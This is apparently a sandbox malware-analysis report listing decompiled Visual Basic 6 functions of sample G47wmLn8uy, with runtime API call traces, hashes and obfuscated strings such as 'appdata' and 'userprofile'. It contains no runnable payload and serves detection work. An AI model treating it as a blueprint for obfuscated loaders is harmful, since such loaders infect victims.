                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 004231E1
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00423240
                                                                                                    • __vbaI2I4.MSVBVM60(00000000,?,00403C2C,00000118), ref: 0042325A
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00423266
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 0042327F
                                                                                                    • #666.MSVBVM60(?,?), ref: 0042328C
                                                                                                    • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 004232B0
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 004232C6
                                                                                                    • #572.MSVBVM60(00000002), ref: 004232EF
                                                                                                    • __vbaStrMove.MSVBVM60(00000002), ref: 004232F9
                                                                                                    • #717.MSVBVM60(?,00000008,00000080,00000000,?,?,?,00000002), ref: 0042332A
                                                                                                    • __vbaVar2Vec.MSVBVM60(?,?,?,00000008,00000080,00000000,?,?,?,00000002), ref: 00423337
                                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000,?,?,?,00000002), ref: 00423344
                                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000,?,?,?,00000002), ref: 0042334C
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,00000002,00000008,?,?,?,?,?,?,00000008,00000080,00000000,?,?,?,00000002), ref: 0042335F
                                                                                                    • #703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00423388
                                                                                                    • __vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00423392
                                                                                                    • __vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0042339A
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,00000006,000000FF,000000FE,000000FE,000000FE), ref: 004233B2
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00423414
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00423473
                                                                                                    • __vbaI2I4.MSVBVM60(00000000,?,00403C2C,00000118), ref: 0042348D
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00423499
                                                                                                    • __vbaFreeStr.MSVBVM60(0042350F), ref: 004234EB
                                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0042350F), ref: 004234F6
                                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,0042350F,00000000,?,0042350F), ref: 00423501
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,0042350F,00000000,?,0042350F), ref: 00423509
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$Move$List$CheckHresult$#717DestructNew2Var2$#572#619#666#667#703Chkstk
                                                                                                    • String ID: Aktiverings$DuB$DuB$DuB$Zoosporangia5$appdata$bugsering$k$userprofile
                                                                                                    • API String ID: 1742684637-1173490879
                                                                                                    • Opcode ID: 82410873bc8333d57119b7af6158442f920b54a57f65d0b0048a4576e873e7aa
                                                                                                    • Instruction ID: 1f66434842af9ef31e416fc89f99c366255d0c6cb2e0dc55e27a9318646d1039
                                                                                                    • Opcode Fuzzy Hash: 82410873bc8333d57119b7af6158442f920b54a57f65d0b0048a4576e873e7aa
                                                                                                    • Instruction Fuzzy Hash: B4D1C871D0022CAADB10EFA1DC45FDEBBB9BF04304F5081AAE119B71A1DB789A49CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00425C02, Relevance: 64.9, APIs: 33, Strings: 4, Instructions: 148COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00425C1E
                                                                                                    • #525.MSVBVM60(0000001D,?,?,?,?,004015F6), ref: 00425C44
                                                                                                    • __vbaStrMove.MSVBVM60(0000001D,?,?,?,?,004015F6), ref: 00425C4E
                                                                                                    • #541.MSVBVM60(?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C5C
                                                                                                    • __vbaStrVarVal.MSVBVM60(?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C69
                                                                                                    • #521.MSVBVM60(00000000,?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C6F
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C79
                                                                                                    • #519.MSVBVM60(00000000,00000000,?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C7F
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C89
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000000,?,?,?,1:1:1,0000001D,?,?,?,?,004015F6), ref: 00425C98
                                                                                                    • __vbaFreeVar.MSVBVM60(?,?,004015F6), ref: 00425CA3
                                                                                                    • #619.MSVBVM60(?,00004008,00000056), ref: 00425CBF
                                                                                                    • __vbaVarTstNe.MSVBVM60(?,?,?,00004008,00000056), ref: 00425CDA
                                                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,00004008,00000056), ref: 00425CE6
                                                                                                    • #698.MSVBVM60(?,00006878,?,?,?,00004008,00000056), ref: 00425D00
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00006878,?,?,?,00004008,00000056), ref: 00425D09
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00006878,?,?,?,00004008,00000056), ref: 00425D13
                                                                                                    • __vbaFreeVar.MSVBVM60(?,?,00006878,?,?,?,00004008,00000056), ref: 00425D1B
                                                                                                    • __vbaVarDup.MSVBVM60(?,?,00006878,?,?,?,00004008,00000056), ref: 00425D34
                                                                                                    • #617.MSVBVM60(?,?,0000002C,?,?,00006878,?,?,?,00004008,00000056), ref: 00425D43
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?,0000002C,?,?,00006878,?,?,?,00004008,00000056), ref: 00425D4C
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,0000002C,?,?,00006878,?,?,?,00004008,00000056), ref: 00425D56
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,0000002C,?,?,00006878,?,?,?,00004008,00000056), ref: 00425D65
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 00425D81
                                                                                                    • #524.MSVBVM60(?,?), ref: 00425D8E
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 00425D97
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?), ref: 00425DA1
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 00425DB0
                                                                                                    • __vbaFreeStr.MSVBVM60(00425E14,?,?,?,00004008,00000056), ref: 00425DEE
                                                                                                    • __vbaFreeStr.MSVBVM60(00425E14,?,?,?,00004008,00000056), ref: 00425DF6
                                                                                                    • __vbaFreeStr.MSVBVM60(00425E14,?,?,?,00004008,00000056), ref: 00425DFE
                                                                                                    • __vbaFreeStr.MSVBVM60(00425E14,?,?,?,00004008,00000056), ref: 00425E06
                                                                                                    • __vbaFreeStr.MSVBVM60(00425E14,?,?,?,00004008,00000056), ref: 00425E0E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$Move$List$#519#521#524#525#541#617#619#698Chkstk
                                                                                                    • String ID: 1:1:1$AFTENKURSER$Forels7$Uselvstndighedens
                                                                                                    • API String ID: 816865869-1332931459
                                                                                                    • Opcode ID: ddd3b6d1161f6872793cf5bf8a55d3e83f7f94a20052d79605553fb067ee2fee
                                                                                                    • Instruction ID: 5570ae447aaab106fbf76ade462b26bd995a3e59c1ccba5a73f293eb170f129b
                                                                                                    • Opcode Fuzzy Hash: ddd3b6d1161f6872793cf5bf8a55d3e83f7f94a20052d79605553fb067ee2fee
                                                                                                    • Instruction Fuzzy Hash: 135171B2D0020C9ADB01FBE1D956EDEB7B8AF14704F50453BE105B71A1EB79AB09CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00425E3B, Relevance: 63.2, APIs: 31, Strings: 5, Instructions: 211COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00425E59
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00425E71
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00425E7C
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 00425EA4
                                                                                                    • #666.MSVBVM60(?,?), ref: 00425EB1
                                                                                                    • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 00425ED5
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 00425EEB
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 00425F1F
                                                                                                    • #515.MSVBVM60(?,?,00000022), ref: 00425F2E
                                                                                                    • __vbaStrVarVal.MSVBVM60(?,?,?,?,00000022), ref: 00425F3B
                                                                                                    • #581.MSVBVM60(00000000,?,?,?,?,00000022), ref: 00425F41
                                                                                                    • #702.MSVBVM60(00000005,000000FF,000000FE,000000FE,000000FE,00000000,?,?,?,?,00000022), ref: 00425F68
                                                                                                    • __vbaStrMove.MSVBVM60(00000005,000000FF,000000FE,000000FE,000000FE,00000000,?,?,?,?,00000022), ref: 00425F72
                                                                                                    • #717.MSVBVM60(?,00000008,00000080,00000000,00000005,000000FF,000000FE,000000FE,000000FE,00000000,?,?,?,?,00000022), ref: 00425FA6
                                                                                                    • __vbaVar2Vec.MSVBVM60(?,?,?,00000008,00000080,00000000,00000005,000000FF,000000FE,000000FE,000000FE,00000000,?,?,?,?), ref: 00425FB9
                                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,00000008,00000080,00000000,00000005,000000FF,000000FE,000000FE,000000FE,00000000,?,?), ref: 00425FC9
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,?,?,?,?,?,00000008,00000080,00000000,00000005,000000FF,000000FE,000000FE,000000FE), ref: 00425FD8
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 00425FF9
                                                                                                    • #703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00426022
                                                                                                    • __vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0042602C
                                                                                                    • __vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00426034
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0042604C
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 004260AE
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 0042610D
                                                                                                    • __vbaI2I4.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00426127
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00426133
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,004015F6), ref: 00426140
                                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,004261CD,?,?,004015F6), ref: 004261AF
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,004261CD,?,?,004015F6), ref: 004261B7
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,004261CD,?,?,004015F6), ref: 004261BF
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,004261CD,?,?,004015F6), ref: 004261C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$CopyListMove$CheckHresult$#515#581#666#702#703#717ChkstkDestructNew2Var2
                                                                                                    • String ID: DuB$EPITHELIA$Skandskriftet2$appdata$vrdibrevs
                                                                                                    • API String ID: 1303855674-3726788226
                                                                                                    • Opcode ID: 1cf0d629689183d522975eebccf4fad7111731d65993e3a9afeb671c66f8c055
                                                                                                    • Instruction ID: 3959da3aacf8ff51fd018e87adbcd18593ac4b00cfbe036b15299d2b2d4b9a03
                                                                                                    • Opcode Fuzzy Hash: 1cf0d629689183d522975eebccf4fad7111731d65993e3a9afeb671c66f8c055
                                                                                                    • Instruction Fuzzy Hash: 9491DA7190021CAADB10EF91CC45FDEB7B9BF04314F5082AAE119B71E1DB785A89CF65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00424A1D, Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 174COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00424A39
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00424A63
                                                                                                    • __vbaStrI4.MSVBVM60(003EF48C,?,?,?,?,004015F6), ref: 00424A6D
                                                                                                    • __vbaStrMove.MSVBVM60(003EF48C,?,?,?,?,004015F6), ref: 00424A77
                                                                                                    • __vbaFPFix.MSVBVM60(00000000,003EF48C,?,?,?,?,004015F6), ref: 00424A83
                                                                                                    • __vbaStrR4.MSVBVM60(?,00000000,003EF48C,?,?,?,?,004015F6), ref: 00424A8C
                                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,003EF48C,?,?,?,?,004015F6), ref: 00424A96
                                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,00000000,003EF48C,?,?,?,?,004015F6), ref: 00424A9C
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,00000000,?,00000000,003EF48C,?,?,?,?,004015F6), ref: 00424AB7
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 00424ADF
                                                                                                    • #619.MSVBVM60(?,?,0000002F), ref: 00424AEE
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?,0000002F), ref: 00424AF7
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,0000002F), ref: 00424B01
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,0000002F), ref: 00424B10
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 00424B2C
                                                                                                    • #717.MSVBVM60(?,?,00000080,00000000), ref: 00424B40
                                                                                                    • __vbaVar2Vec.MSVBVM60(?,?,?,?,00000080,00000000), ref: 00424B4D
                                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,00000080,00000000), ref: 00424B5A
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00424B69
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,?,?,?,?,?,?,?,?,004015F6), ref: 00424B84
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00424BD1
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00424C18
                                                                                                    • __vbaI2I4.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00424C2F
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00424C3B
                                                                                                    • __vbaFreeStr.MSVBVM60(00424CA3), ref: 00424C8A
                                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00424CA3), ref: 00424C95
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,00424CA3), ref: 00424C9D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$Move$List$CheckHresult$#619#717ChkstkCopyDestructNew2Var2
                                                                                                    • String ID: Brkningens$DuB$DuB$Enamelware3
                                                                                                    • API String ID: 1076052315-670747076
                                                                                                    • Opcode ID: aace4e2df6a8da6e8bf6a129aff83b7fbcaff1b2554234de0e2017a6cd0c2c53
                                                                                                    • Instruction ID: 91708f5cd7f831ac8d45fee594fe96f3e9d5525b0ee2a48ee0e495f857c2622b
                                                                                                    • Opcode Fuzzy Hash: aace4e2df6a8da6e8bf6a129aff83b7fbcaff1b2554234de0e2017a6cd0c2c53
                                                                                                    • Instruction Fuzzy Hash: FA61EC71940218ABDB10EFE1D945FDEBBB8AF04704F50813AF105BB1A2DB789A49CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00422CE9, Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 200COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00422D06
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00422D1E
                                                                                                    • #538.MSVBVM60(?,00000125,00000002,00000001,?,?,?,?,004015F6), ref: 00422D30
                                                                                                    • _adj_fdiv_m64.MSVBVM60(?,00000125,00000002,00000001,?,?,?,?,004015F6), ref: 00422D54
                                                                                                    • _adj_fdiv_m64.MSVBVM60(?,00000125,00000002,00000001,?,?,?,?,004015F6), ref: 00422D76
                                                                                                    • __vbaVarTstGe.MSVBVM60(00008005,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00422D97
                                                                                                    • __vbaFreeVar.MSVBVM60(00008005,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00422DA3
                                                                                                    • #717.MSVBVM60(?,00006011,00000040,00000000,00008005,?), ref: 00422DCD
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000,00008005,?), ref: 00422DD6
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000,00008005,?), ref: 00422DE0
                                                                                                    • __vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000,00008005,?), ref: 00422DE8
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,?,?,00006011,00000040,00000000,00008005,?), ref: 00422E00
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00422E44
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00422E8B
                                                                                                    • __vbaI2I4.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00422EA2
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000118), ref: 00422EAE
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544), ref: 00422EC6
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00422F13
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,000000D8), ref: 00422F5A
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00403C2C,000000D8), ref: 00422F7E
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403C2C,000000D8), ref: 00422F86
                                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00422FE0,00008005,?), ref: 00422FC2
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,00422FE0,00008005,?), ref: 00422FCA
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,00422FE0,00008005,?), ref: 00422FD2
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,00422FE0,00008005,?), ref: 00422FDA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$CheckHresult$Move$New2_adj_fdiv_m64$#538#717ChkstkCopyDestruct
                                                                                                    • String ID: DuB$DuB$]n
                                                                                                    • API String ID: 499695664-2417534752
                                                                                                    • Opcode ID: 7fee2e79c741a8391c3957704782dcf80fa34db9c21a1954f82b6c53fe1a879a
                                                                                                    • Instruction ID: 46e926860ea133417623d503309bb6748635725ea68a8fae88d23343af3a02fb
                                                                                                    • Opcode Fuzzy Hash: 7fee2e79c741a8391c3957704782dcf80fa34db9c21a1954f82b6c53fe1a879a
                                                                                                    • Instruction Fuzzy Hash: 9A810571A40228EFDB10EFA5DE45BEDBBB4BF08304F50406AE105BB2A1DB785A45DF18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00425574, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 150COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00425592
                                                                                                    • #535.MSVBVM60(?,?,?,?,004015F6), ref: 004255BD
                                                                                                    • #574.MSVBVM60(00000003), ref: 004255D7
                                                                                                    • __vbaStrMove.MSVBVM60(00000003), ref: 004255E1
                                                                                                    • __vbaStrCmp.MSVBVM60(HECKLER,00000000,00000003), ref: 004255EC
                                                                                                    • __vbaFreeStr.MSVBVM60(HECKLER,00000000,00000003), ref: 00425602
                                                                                                    • __vbaFreeVar.MSVBVM60(HECKLER,00000000,00000003), ref: 0042560A
                                                                                                    • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,HECKLER,00000000,00000003), ref: 00425640
                                                                                                    • #632.MSVBVM60(?,00000003,000000C2,?,?,?,?,?,?,?,?,?,?,HECKLER,00000000,00000003), ref: 00425656
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000003,000000C2,?,?,?,?,?,?,?,?,?,?,HECKLER,00000000), ref: 0042565F
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000003,000000C2,?,?,?,?,?,?,?,?,?,?,HECKLER,00000000), ref: 00425669
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,?,?,00000003,000000C2,?), ref: 0042567C
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,?,?,?,004015F6), ref: 00425697
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 004256F9
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000130), ref: 00425755
                                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042577F
                                                                                                    • __vbaFreeObj.MSVBVM60 ref: 00425787
                                                                                                    • __vbaOnError.MSVBVM60(00000000), ref: 0042578E
                                                                                                    • #648.MSVBVM60(0000000A,HECKLER,00000000,00000003), ref: 004257A5
                                                                                                    • __vbaFreeVar.MSVBVM60(0000000A,HECKLER,00000000,00000003), ref: 004257B1
                                                                                                    • __vbaFreeStr.MSVBVM60(004257F6,0000000A,HECKLER,00000000,00000003), ref: 004257E8
                                                                                                    • __vbaFreeStr.MSVBVM60(004257F6,0000000A,HECKLER,00000000,00000003), ref: 004257F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$Move$CheckHresult$#535#574#632#648ChkstkErrorListNew2
                                                                                                    • String ID: DuB$HECKLER$forskrkkelserne
                                                                                                    • API String ID: 1000924570-2406200853
                                                                                                    • Opcode ID: 9373a1485bf9ba3993a2320b00f5635aa4732b8fef3289d839503261421eaf44
                                                                                                    • Instruction ID: 15e2b4e6afc003c1e9a3cf0eac397a5d29980e36a9ea3acd357efe9535629327
                                                                                                    • Opcode Fuzzy Hash: 9373a1485bf9ba3993a2320b00f5635aa4732b8fef3289d839503261421eaf44
                                                                                                    • Instruction Fuzzy Hash: B7610871A40228EFDB10EFA5CC95BDEB7B4BF04304F5080AAE145B72A1DB785A45CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004258FC, Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 174COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 0042591A
                                                                                                    • #608.MSVBVM60(?,000000A1,?,?,?,?,004015F6), ref: 00425947
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 00425960
                                                                                                    • #518.MSVBVM60(?,?), ref: 0042596D
                                                                                                    • __vbaVarTstNe.MSVBVM60(?,?,?,?), ref: 0042597A
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?), ref: 00425991
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,?,?,?,004015F6), ref: 004259B8
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00425A0E
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000140), ref: 00425A6A
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403C2C,00000140), ref: 00425A89
                                                                                                    • #616.MSVBVM60(Jonbytningens,0000005C), ref: 00425A95
                                                                                                    • __vbaStrMove.MSVBVM60(Jonbytningens,0000005C), ref: 00425A9F
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,Jonbytningens,0000005C), ref: 00425AB7
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014), ref: 00425B0D
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,000000F8), ref: 00425B69
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00403C2C,000000F8), ref: 00425B93
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403C2C,000000F8), ref: 00425B9B
                                                                                                    • __vbaFreeStr.MSVBVM60(00425BE3,?,?,?,004015F6), ref: 00425BD5
                                                                                                    • __vbaFreeStr.MSVBVM60(00425BE3,?,?,?,004015F6), ref: 00425BDD
